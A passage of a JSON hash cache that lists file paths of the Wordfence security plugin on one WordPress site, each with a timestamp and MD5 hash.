ce\\/wf-waf\\/src\\/lib\\/json.php\":{\"d\":1544704184,\"h\":\"9b8d8e9bc3f86423fb9dcb6bd5e2fb9b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/vendor\\/wordfence\\/wf-waf\\/src\\/lib\\/config.php\":{\"d\":1544704184,\"h\":\"cdc87bf631ac4d07529c4b455fdffa2f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/vendor\\/wordfence\\/wf-waf\\/src\\/lib\\/waf.php\":{\"d\":1544704184,\"h\":\"2244c57a6d1ccd34d161bc7922f7ef63\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/vendor\\/wordfence\\/wf-waf\\/src\\/views\\/403-roadblock.php\":{\"d\":1544704187,\"h\":\"57a604c21c5e7096df17fa9189e34fcc\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/vendor\\/wordfence\\/wf-waf\\/src\\/views\\/503-lockout.php\":{\"d\":1544704187,\"h\":\"4ea3d960413d109e3c04499a029c53db\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/vendor\\/wordfence\\/wf-waf\\/src\\/views\\/403-blacklist.php\":{\"d\":1544704187,\"h\":\"a05b46fe59cfa93f8e682c89ba2d5a37\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/vendor\\/wordfence\\/wf-waf\\/src\\/views\\/403.php\":{\"d\":1544704187,\"h\":\"6cd70c7b0992b1132b7089e70af10e70\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/vendor\\/wordfence\\/wf-waf\\/src\\/views\\/503.php\":{\"d\":1544704187,\"h\":\"cbf473b1cc7bdb9e0250aa042097fadd\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/vendor\\/wordfence\\/wf-waf\\/src\\/falsepositive.key\":{\"d\":1544704184,\"h\":\"8e82683caae9b67cdb3762089aa99db8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/vendor\\/wordfence\\/wf-waf\\/src\\/init.php\":{\"d\":1544704184,\"h\":\"f3e3261322f261b0d0d6b6d51f6db2ec\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/vendor\\/wordfence\\/wf-waf\\/src\\/cacert.pem\":{\"d\":1544704187,\"h\":\"38cd779c9429ab6e2e5ae3437b763238\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/vendor\\/wordfence\\/wf-waf\\/src\\/rules.key\":{\"d\":1544704187,\"h\":\"10baa71a6c595e5b460dc83278cabb02\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/vendor\\/maxmind\\/web-service-common\\/src\\/Exception\\/AuthenticationException.php\":{\"d\":1544704187,\"h\":\"4b236c4a50a88b6530759f67a5db9481\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/vendor\\/maxmind\\/web-service-common\\/src\\/Exception\\/InvalidRequestException.php\":{\"d\":1544704187,\"h\":\"0c16475216cb97056385eda43f7174e7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/vendor\\/maxmind\\/web-service-common\\/src\\/Exception\\/InvalidInputException.php\":{\"d\":1544704187,\"h\":\"72dc20089eb4a5cfaccafe6e2b17a36e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/vendor\\/maxmind\\/web-service-common\\/src\\/Exception\\/PermissionRequiredException.php\":{\"d\":1544704187,\"h\":\"f832cea2f10902ae2ffa4521e13c73d1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/vendor\\/maxmind\\/web-service-common\\/src\\/Exception\\/HttpException.php\":{\"d\":1544704187,\"h\":\"9434316c23197db770e6c7c6037a6b31\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/vendor\\/maxmind\\/web-service-common\\/src\\/Exception\\/WebServiceException.php\":{\"d\":1544704187,\"h\":\"6882e0d113e22478202f99caf306bde9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/vendor\\/maxmind\\/web-service-common\\/src\\/Exception\\/InsufficientFundsException.php\":{\"d\":1544704187,\"h\":\"14886d684f1be0b4b28a66f4b22e490f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/vendor\\/maxmind\\/web-service-common\\/src\\/Exception\\/IpAddressNotFoundException.php\":{\"d\":1544704187,\"h\":\"16313ab0d82195477e1ba071e7696313\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/vendor\\/maxmind\\/web-service-common\\/src\\/WebService\\/Http\\/Request.php\":{\"d\":1544704187,\"h\":\"978f4b64578cb9aad8bf0745c457f8af\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/vendor\\/maxmind\\/web-service-common\\/src\\/WebService\\/Http\\/RequestFactory.php\":{\"d\":1544704187,\"h\":\"ea623b76279567c2d1017e949eaeaf6b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/vendor\\/maxmind\\/web-service-common\\/src\\/WebService\\/Http\\/CurlRequest.php\":{\"d\":1544704187,\"h\":\"b7e7704b7a92e40360df29395f4008a0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/vendor\\/maxmind\\/web-service-common\\/src\\/WebService\\/Client.php\":{\"d\":1544704187,\"h\":\"f0dd87340d59346a65ec36e839f79628\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/vendor\\/maxmind\\/web-service-common\\/LICENSE\":{\"d\":1544704187,\"h\":\"3b83ef96387f14655fc854ddc3c6bd57\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/vendor\\/maxmind-db\\/reader\\/src\\/MaxMind\\/Db\\/Reader\\/Metadata.php\":{\"d\":1544704187,\"h\":\"9a5a3cba86e689c77b0e7e47e1a26628\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/vendor\\/maxmind-db\\/reader\\/src\\/MaxMind\\/Db\\/Reader\\/Decoder.php\":{\"d\":1544704187,\"h\":\"6ff9a9299dd715c8ec2cfe6abf62d1d5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/vendor\\/maxmind-db\\/reader\\/src\\/MaxMind\\/Db\\/Reader\\/Util.php\":{\"d\":1544704187,\"h\":\"67c42bf8daa9c064deddac400cadf3fd\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/vendor\\/maxmind-db\\/reader\\/src\\/MaxMind\\/Db\\/Reader\\/InvalidDatabaseException.php\":{\"d\":1544704187,\"h\":\"30a5d8369ea2012e747ac1e59f78c76f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/vendor\\/maxmind-db\\/reader\\/src\\/MaxMind\\/Db\\/Reader.php\":{\"d\":1544704187,\"h\":\"397e95ff62e0e5ca74501a4465af7c5b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/vendor\\/maxmind-db\\/reader\\/LICENSE\":{\"d\":1544704187,\"h\":\"3b83ef96387f14655fc854ddc3c6bd57\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/vendor\\/autoload.php\":{\"d\":1544704184,\"h\":\"8d6e17671d94b83a6f3e712c7242071f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/vendor\\/.htaccess\":{\"d\":1544704187,\"h\":\"a34522784bcaea0e7bc738f6645312b3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/reports\\/activity-report-email-inline.php\":{\"d\":1544704187,\"h\":\"4eb44164b144fa31b6c41cec3751effc\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/reports\\/activity-report.php\":{\"d\":1544704187,\"h\":\"cd19074f94b8c0892e39d69a9e7feee1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/gdpr\\/banner.php\":{\"d\":1544704187,\"h\":\"2a4b840e60813bc28200d67d7f94860f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/gdpr\\/disabled-overlay.php\":{\"d\":1544704187,\"h\":\"bf21fd1e2a866f1facb032c2af861224\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/common\\/modal-prompt.php\":{\"d\":1544704187,\"h\":\"99cb8162e6845bca6c6d39017377a95e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/common\\/block-navigation-option.php\":{\"d\":1544704187,\"h\":\"eea85f4a3cf03daad0179402480b492f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/common\\/indeterminate-progress.php\":{\"d\":1544704187,\"h\":\"49b7e622dd7367bd7f1734885c28b138\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/common\\/license.php\":{\"d\":1544704187,\"h\":\"795ea7403a46c267e3717f5d70ed214a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/common\\/status-circular.php\":{\"d\":1544704187,\"h\":\"f0e219df7fba2919df2e1e3da3b7a567\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/common\\/status-critical.php\":{\"d\":1544704187,\"h\":\"51935bf55b5f595bca9b1cdceb4a7b26\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/common\\/page-fixed-tabbar.php\":{\"d\":1544704187,\"h\":\"f34d23c6822c886e9ac8cc6a397ba299\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/common\\/status-warning.php\":{\"d\":1544704187,\"h\":\"6d9466b775d6ba672d14670043d63d76\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/common\\/page-title.php\":{\"d\":1544704187,\"h\":\"c5dc6141273490f5063de306c147b367\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/common\\/section-subtitle.php\":{\"d\":1544704187,\"h\":\"fa4b01e163a6db44b5f8c383a4c2dbac\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/common\\/section-title.php\":{\"d\":1544704187,\"h\":\"a20883775db151a856f7d5b4691e13ab\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/common\\/unsubscribe.php\":{\"d\":1544704187,\"h\":\"f97d8d7daae0cf73024ae4e117f34b81\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/common\\/page-help.php\":{\"d\":1544704187,\"h\":\"e232d46fd6c4005823eb96381533947e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/common\\/status-tooltip.php\":{\"d\":1544704187,\"h\":\"25650da97f46649ce7f645050f307342\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/common\\/status-detail.php\":{\"d\":1544704187,\"h\":\"a6d1bf44ca00bb7cf69510b2f173e657\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/common\\/page-tabbar.php\":{\"d\":1544704187,\"h\":\"bb83291aafb00cf374553245633027e9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/dashboard\\/options-group-import.php\":{\"d\":1544704187,\"h\":\"3d53c9306ceea94ba8bd405ecbf83d0e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/dashboard\\/option-howgetips.php\":{\"d\":1544704187,\"h\":\"90eccfa498535a323de4a8cfc78cf55e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/dashboard\\/global-status.php\":{\"d\":1544704187,\"h\":\"982e319fdad028193ef704ab1a56457e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/dashboard\\/options-group-email-summary.php\":{\"d\":1544704187,\"h\":\"36233e7b7a71b8db0a5325bdf8a8a14d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/dashboard\\/options-group-alert.php\":{\"d\":1544704187,\"h\":\"05bf3f59e28451a312dc12ac18314870\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/dashboard\\/options-group-view-customization.php\":{\"d\":1544704187,\"h\":\"7e0b4860e802b462006e7642204a5122\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/dashboard\\/options-group-dashboard.php\":{\"d\":1544704187,\"h\":\"fc2610846d3a378be17681d73dcdea9e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/dashboard\\/status-renewing.php\":{\"d\":1544704187,\"h\":\"616eb924cd0136a8dde519bab9162205\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/dashboard\\/options-group-license.php\":{\"d\":1544704187,\"h\":\"4f611c197aa3dcd076a98a658e2cdfff\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/dashboard\\/status-payment-expiring.php\":{\"d\":1544704187,\"h\":\"1772611c5827c9e17a00352b9322a837\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/dashboard\\/options-group-general.php\":{\"d\":1544704187,\"h\":\"e64a2d0c5e508f2f17591fe0997acc77\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/onboarding\\/fresh-install.php\":{\"d\":1544704187,\"h\":\"3d51167c2ca0ca4590f28126e17b43e4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/onboarding\\/plugin-header.php\":{\"d\":1544704187,\"h\":\"91d8250304a15838206d783e26acf197\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/onboarding\\/banner.php\":{\"d\":1544704187,\"h\":\"821386aea5309dcd92a66c008bfe42d6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/onboarding\\/disabled-overlay.php\":{\"d\":1544704187,\"h\":\"adc7fee46205f6d5979b1c6cda0fe36e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/onboarding\\/tour-overlay.php\":{\"d\":1544704187,\"h\":\"993a03e8be16bd259b20189f293ba700\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/onboarding\\/modal-final-attempt.php\":{\"d\":1544704187,\"h\":\"abbf88d79203fad122d43f070c713723\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/onboarding\\/overlay.php\":{\"d\":1544704187,\"h\":\"e2139269c5aef439f56560f8d01632ee\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/tools\\/options-group-2fa.php\":{\"d\":1544704187,\"h\":\"c2dc159cca006593936af96ab6029d43\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/tools\\/options-group-live-traffic.php\":{\"d\":1544704187,\"h\":\"a5355f2b14a1a91cb5c716c3cd450547\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/scanner\\/issue-commentBadURL.php\":{\"d\":1544704187,\"h\":\"0f9696345a3f64149795a51b8fe2a2a1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/scanner\\/scan-scheduling.php\":{\"d\":1544704187,\"h\":\"005719bfecae9cc3298ca0c7a2c7c2b1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/scanner\\/options-group-advanced.php\":{\"d\":1544704187,\"h\":\"52be955974114f603615717acdc2e68f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/scanner\\/options-group-scan-schedule.php\":{\"d\":1544704187,\"h\":\"c5b9bf9f2ddc897c9dc2e14a9ff2ad55\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/scanner\\/issue-wfPluginUpgrade.php\":{\"d\":1544704187,\"h\":\"ae96a4ab6184527023fe9cfcb9e670e5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/scanner\\/issue-optionBadURL.php\":{\"d\":1544704187,\"h\":\"fa9874c0a3224ea69f2beef5d59b4ce1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/scanner\\/options-group-performance.php\":{\"d\":1544704187,\"h\":\"7a4a2f62a11dfec07ecfc15cdd2aed1b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/scanner\\/scan-failed.php\":{\"d\":1544704187,\"h\":\"a1e7ad45e8dbbb05303472b6f61ef7a5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/scanner\\/scan-progress-element.php\":{\"d\":1544704187,\"h\":\"03cd1e4af98ec52125498b57e062179c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/scanner\\/issue-dnsChange.php\":{\"d\":1544704187,\"h\":\"5d76ce862e53949786485eb3e699777a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/scanner\\/issue-wpscan_fullPathDiscl.php\":{\"d\":1544704187,\"h\":\"740e869e47beee4ec6dc38b109fae836\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/scanner\\/scan-starter.php\":{\"d\":1544704187,\"h\":\"4513a88e12f820c1936006627b7b760d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/scanner\\/issue-publiclyAccessible.php\":{\"d\":1544704187,\"h\":\"3d336e2e8f5a4b37e6a152627e3c84f2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/scanner\\/site-cleaning-bottom.php\":{\"d\":1544704187,\"h\":\"a02c49f7931c7330773451a4131794fa\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/scanner\\/scan-type.php\":{\"d\":1544704187,\"h\":\"aad74e8440f27c101d31fdf0cc439492\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/scanner\\/options-group-basic.php\":{\"d\":1544704187,\"h\":\"7f8c1f022cac7a370a17fec9b2d7df9e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/scanner\\/option-scan-signatures.php\":{\"d\":1544704187,\"h\":\"647a471c95958cf36627506964d169ab\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/scanner\\/issue-wfPluginVulnerable.php\":{\"d\":1544704187,\"h\":\"187488c80e7677580a5f596721ff1fb2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/scanner\\/issue-geoipSupport.php\":{\"d\":1544704187,\"h\":\"a900ab12103c91a8ee8a5efdb03dee66\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/scanner\\/scan-progress.php\":{\"d\":1544704187,\"h\":\"ce25f60aef7213c1453f986dc5feff9e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/scanner\\/issue-control-hide-file.php\":{\"d\":1544704187,\"h\":\"795f565e0fc10a258ca38b701dfdca63\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/scanner\\/issue-control-edit-user.php\":{\"d\":1544704187,\"h\":\"cd44e7a76434fa278f085429c3e77fb7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/scanner\\/site-cleaning.php\":{\"d\":1544704187,\"h\":\"35ff0777312c35ad62ab9d846476ae46\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/scanner\\/issue-checkGSB.php\":{\"d\":1544704187,\"h\":\"540426fff114a1982369a75ddd3c7b19\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/scanner\\/issue-suspiciousAdminUsers.php\":{\"d\":1544704187,\"h\":\"f9500c11913c006341bd46c54ce6d14e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/scanner\\/no-issues.php\":{\"d\":1544704187,\"h\":\"78742d7cf846defd8ea8d0d1e98565aa\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/scanner\\/issue-database.php\":{\"d\":1544704187,\"h\":\"5b9bfe0c200a86526fa24e0e37d6117c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/scanner\\/issue-easyPassword.php\":{\"d\":1544704187,\"h\":\"d05bb42b65b4b95b65fbcf99bf665782\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/scanner\\/issue-knownfile.php\":{\"d\":1544704187,\"h\":\"cd475e3db2708a3d24f719a71af1ae32\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/scanner\\/scanner-status.php\":{\"d\":1544704187,\"h\":\"de91f0f85b2ec99599def6026c5c3a12\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/scanner\\/issue-checkSpamIP.php\":{\"d\":1544704187,\"h\":\"9cded8f060589b63c16237b5714e538a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/scanner\\/issue-postBadURL.php\":{\"d\":1544704187,\"h\":\"feb8759340dea6d624a67f89e8f6e22c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/scanner\\/issue-coreUnknown.php\":{\"d\":1544704187,\"h\":\"e5d8b16d193a68f30d471d5aaada8b59\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/scanner\\/issue-wfThemeUpgrade.php\":{\"d\":1544704187,\"h\":\"3988c2a10ef8cee35e2d2ce68eaa4567\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/scanner\\/scan-results.php\":{\"d\":1544704187,\"h\":\"d9ccd7ddc8c80e0238ce828eb72cfd5c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/scanner\\/issue-control-edit-comment.php\":{\"d\":1544704187,\"h\":\"203bcd8f287670d7e81f6f71b492e6b4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/scanner\\/issue-wpscan_directoryList.php\":{\"d\":1544704187,\"h\":\"8569c40530f4a66a3889320ada739e1d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/scanner\\/issue-wfUpgrade.php\":{\"d\":1544704187,\"h\":\"95a3d3444fdb8f7ebb2a7316a10c2fc1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/scanner\\/issue-control-ignore.php\":{\"d\":1544704187,\"h\":\"8296b0fe8efca7f25c506d40e18d6e99\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/scanner\\/issue-postBadTitle.php\":{\"d\":1544704187,\"h\":\"df64992beac7e7f66cdfc1401ffd68c6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/scanner\\/issue-checkHowGetIPs.php\":{\"d\":1544704187,\"h\":\"3a9d3edea488802b7ece74cdabbfae2a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/scanner\\/issue-base.php\":{\"d\":1544704187,\"h\":\"d1263386dc5a1cf109bf5200b0378e75\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/scanner\\/issue-control-edit-post.php\":{\"d\":1544704187,\"h\":\"1d6e81a9ca5ad3044855e51dcf98bc8f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/scanner\\/site-cleaning-beta-sigs.php\":{\"d\":1544704187,\"h\":\"2c8b2952d471a2c679bb7cb4ad34842e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/scanner\\/issue-file.php\":{\"d\":1544704187,\"h\":\"3fb37d19c6932efece9c653114f7b255\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/scanner\\/issue-control-show-details.php\":{\"d\":1544704187,\"h\":\"49e81886c936cfb2d214bfc493aa5deb\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/scanner\\/issue-spamvertizeCheck.php\":{\"d\":1544704187,\"h\":\"17cae125d8983588d061e54fb55fb490\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/scanner\\/issue-timelimit.php\":{\"d\":1544704187,\"h\":\"4a375ea49810d19a124f19e90c9df569\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/scanner\\/issue-wfPluginRemoved.php\":{\"d\":1544704187,\"h\":\"c639ae3a37f69b855d366856116ff6e2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/scanner\\/scan-progress-detailed.php\":{\"d\":1544704187,\"h\":\"108bd32018b36a3c63ec2853434abb1b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/scanner\\/issue-wfPluginAbandoned.php\":{\"d\":1544704187,\"h\":\"d16a76c25bfe70d5bb92c6e342b94df3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/scanner\\/issue-control-repair.php\":{\"d\":1544704187,\"h\":\"17105bd0becfdab0a98c02